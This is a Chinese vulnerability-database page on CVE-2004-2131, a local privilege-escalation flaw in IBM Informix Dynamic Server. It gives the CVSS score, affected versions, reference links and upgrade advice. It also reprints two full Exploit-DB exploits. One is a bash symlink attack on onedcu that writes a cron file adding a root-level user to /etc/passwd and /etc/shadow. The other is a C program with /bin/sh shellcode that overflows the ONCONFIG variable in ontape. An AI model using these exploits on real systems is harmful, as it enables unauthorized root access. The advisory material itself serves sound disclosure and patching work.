CVE-2004-2131
CVSS7.2
发布时间 :2004-01-27 00:00:00
修订时间 :2016-10-17 23:06:49
NMCOE    

[原文]Stack-based buffer overflow in ontape for IBM Informix Dynamic Server (IDS) 9.40.xC3 and earlier allows local users, with DSA privileges, to execute arbitrary code via a long ONCONFIG environment variable.


[CNNVD]IBM Informix多个本地权限提升漏洞(CNNVD-200401-061)

        IBM Informix Dynamic Server是一款动态数据库管理软件,Informix Extended Parallel Server(XPS) 是并行处理的数据库服务器。
        IBM Informix Dymanic Server和Informix Extended Parallel Server包含安全问题,本地攻击者可以利用这些漏洞进行权限提升,访问文件系统等攻击。
        这些漏洞可导致获得root用户权限或读取所有系统文件。目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ibm:informix_extended_parallel_server:8.40_uc1IBM Informix Extended Parallel Server 8.40 UC1
cpe:/a:ibm:informix_dynamic_server:9.40.uc2IBM Informix IDS 9.40.UC2
cpe:/a:ibm:informix_dynamic_server:9.40.uc1IBM Informix IDS 9.40.UC1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2131
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2131
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200401-061
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107539878804074&w=2
(UNKNOWN)  BUGTRAQ  20040129 ----------========== OPEN3S-2003-08-08-eng-informix-ontape
http://www-1.ibm.com/support/docview.wss?uid=swg21153336
(VENDOR_ADVISORY)  CONFIRM  http://www-1.ibm.com/support/docview.wss?uid=swg21153336
http://www.securityfocus.com/bid/9512
(VENDOR_ADVISORY)  BID  9512
http://xforce.iss.net/xforce/xfdb/14970
(VENDOR_ADVISORY)  XF  informix-ontape-binary-bo(14970)

- 漏洞信息

IBM Informix多个本地权限提升漏洞
高危 未知
2004-01-27 00:00:00 2005-10-20 00:00:00
本地  
        IBM Informix Dynamic Server是一款动态数据库管理软件,Informix Extended Parallel Server(XPS) 是并行处理的数据库服务器。
        IBM Informix Dymanic Server和Informix Extended Parallel Server包含安全问题,本地攻击者可以利用这些漏洞进行权限提升,访问文件系统等攻击。
        这些漏洞可导致获得root用户权限或读取所有系统文件。目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        IBM
        ---
        运行IBM Informix Dynamic Server 9.40.UC2及之前版本的用户建议升级到IBM Informix Dynamic Server 9.40.UC3。运行了IBM Informix Extended Parallel Server 8.40.UD1之前版本的用户建议升级到IBM Informix Extended Parallel Server 8.40.UD1。
        用户可以联系供应商获得补丁。
        
        http://www.ibm.com

- 漏洞信息 (23609)

IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 Multiple Vulnerabilities (1) (EDBID:23609)
unix local
2003-08-08 Verified
0 pask
N/A [点击下载]
source: http://www.securityfocus.com/bid/9512/info

IBM Informix Dynamic Server and IBM Informix Extended Parallel Server have been reported prone to multiple vulnerabilities.

The first issue exists in the onedcu binary. Specifically, when the binary is invoked a predictable temporary file is created. A local attacker may exploit this issue to launch symbolic link style attacks ultimately resulting in elevated privileges.

The second issue that has been reported to exist in the ontape binary. The ontape binary has been reported to be prone to a local stack based buffer overflow vulnerability. Ultimately the attacker may exploit this condition to influence execution flow of the vulnerable binary into attacker-controlled memory. This may lead to the execution of arbitrary instructions with elevated privileges.

A third issue has been reported to affect the onshowaudit binary. Specifically, the onshowaudit binary reads data from temporary files contained in the "tmp? directory. These files have predictable filenames; an attacker may exploit this issue to disclose data that may be used in further attacks launched against the vulnerable system. 

#!/bin/bash

ONEDCU=/home/informix-9.40/bin/onedcu
CRONFILE=/etc/cron.hourly/pakito
USER=pakito
DIR=./trash

export INFORMIXDIR=/home/informix-9.40/
export ONCONFIG=onconfig.std

        if [ -d $DIR ]; then
                echo Trash directory already created
        else
                mkdir $DIR
        fi

cd $DIR
        if [ -f ./"\001" ]; then
                echo Link Already Created
        else
                ln -s $CRONFILE `echo -e "\001"`
        fi

umask 000
$ONEDCU &
kill -9 `pidof $ONEDCU`


echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo " "
echo "  This vulnerability was researched by Juan Manuel Pascual Escriba"
echo "  08/08/2003 Barcelona - Spain pask@
3s.com
echo " "
echo "  must wait until cron execute $CRONFILE and then exec su pakito"
		

- 漏洞信息 (23610)

IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 Multiple Vulnerabilities (2) (EDBID:23610)
unix local
2003-08-08 Verified
0 pask
N/A [点击下载]
source: http://www.securityfocus.com/bid/9512/info
 
IBM Informix Dynamic Server and IBM Informix Extended Parallel Server have been reported prone to multiple vulnerabilities.
 
The first issue exists in the onedcu binary. Specifically, when the binary is invoked a predictable temporary file is created. A local attacker may exploit this issue to launch symbolic link style attacks ultimately resulting in elevated privileges.
 
The second issue that has been reported to exist in the ontape binary. The ontape binary has been reported to be prone to a local stack based buffer overflow vulnerability. Ultimately the attacker may exploit this condition to influence execution flow of the vulnerable binary into attacker-controlled memory. This may lead to the execution of arbitrary instructions with elevated privileges.
 
A third issue has been reported to affect the onshowaudit binary. Specifically, the onshowaudit binary reads data from temporary files contained in the "tmp? directory. These files have predictable filenames; an attacker may exploit this issue to disclose data that may be used in further attacks launched against the vulnerable system. 

/* Exploit informix 8or user with DSA privileges -> root in a Informix IDSv9.40. it seems to
exist a correct environment variable size checking for INFORMIXDIR (old security nightmare in
other versions) but forgot to check ONCONFIG env vble size.

We can found similar ONCONFIG overflows, but In other binaries in this installation exists a
setuid32(0x1f7) (the uid for informix user in my installation) before the bof occurs.
Unfortunately not in this binary


Vulnerability researched by        Juan Manuel Pascual Escriba
08/08/2003 Barcelona - Spain       pask@open3s.com
http://www.open3s.com

*/

#include <stdio.h>



char sc[]=
"\x29\xc0"                               
"\x29\xdb"                                         
"\x29\xc9"                                
"\x29\xd2"                               
"\xb0\xa4"                              
"\xcd\x80"                             
"\xeb\x1f"
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";


#define STACK_TOP_X86 0xC0000000
#define ALG_MASK 0xfffffff4
#define ADDR 560
#define DFL_ALG 4
#define INFORMIXDIR "/home/informix-9.40/"
#define ONTAPE "/home/informix-9.40/bin/ontape"


int main(int arc, char **arv){
        char *argv[2];
        char *envp[3];
        unsigned long sc_address, ba=0;
        unsigned char alg = DFL_ALG;
        unsigned long *p;
        unsigned char *q;
        unsigned int i;




        /* calculate where in the stack will be our shellcode */

        sc_address = STACK_TOP_X86 - 4 - strlen(ONTAPE) - sizeof(sc) - 1;
        printf("shellcode address = 0x%X\n",sc_address);

        /* add back pad to align sc if necessary */

        if( (sc_address & ALG_MASK) != sc_address ) {
                ba = sc_address - (sc_address & ALG_MASK);
                printf("adding %d trailing bytes to backward align hellcode to 0x%X\n", ba,
sc_address & ALG_MASK);
                sc_address = STACK_TOP_X86 - 4 - strlen(ONTAPE) - sizeof(sc) - ba - 1;
                printf("new shellcode address = 0x%X\n",sc_address);
        }

        /* craft zhellcoded environment */
        envp[2] = (char*)malloc(sizeof(sc)+strlen("pete=")+1+ba);
        q = envp[2];
        strcpy(q,"pete=");
        q += strlen("pete=");
        memcpy(q,sc,sizeof(sc));
        q += sizeof(sc)-1;
        memset(q,'A',ba);
        q += ba;
        *q = 0;

        /* build overflowing arvg */

        alg = DFL_ALG;

        printf("using alignment = %d in overflow buffer\n",alg);
        if(arv[2]) alg = atoi(arv[2]);

        argv[0] = ONTAPE;
	argv[1] = 0;

	/* finalizamos argv[] aqui el overflow esta en una variable de entorno
	llamada ONCONFIG */

	envp[0] = (char*)malloc(ADDR*sizeof(unsigned long)+alg+1+strlen("ONCONFIG="));
	q = envp[0];
	strcpy(q,"ONCONFIG=");
	q += strlen ("ONCONFIG=");
	memset(q,'A',alg);
	q += alg -1;
        p=(unsigned long*)(envp[0]+alg+strlen("ONCONFIG="));
        for(i=0;i<ADDR;i++) {
                *p = sc_address;
                p++;
        };
        *p = 0;
        envp[1] = "INFORMIXDIR=/home/informix-9.40"; 
	envp[3] = 0;
        
	printf("executing %s ...\n\n",argv[0]);
        execve(argv[0],argv,envp); 



}


		

- 漏洞信息

3759
IBM Informix Database ontape Overflow
Local Access Required Authentication Management, Input Manipulation
Loss of Integrity, Loss of Availability

- 漏洞描述

A local overflow exists in IBM's Informix Database. The "ontape" binary contains a boundary error resulting in a buffer overflow. With a specially crafted request, an attacker can cause gain root privileges resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-01-28 Unknow
Unknow Unknow

- 解决方案

Upgrade to IBM Informix Dynamic Server 9.40.UC3 or IBM Informix Extended Parallel Server 8.40.UD1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站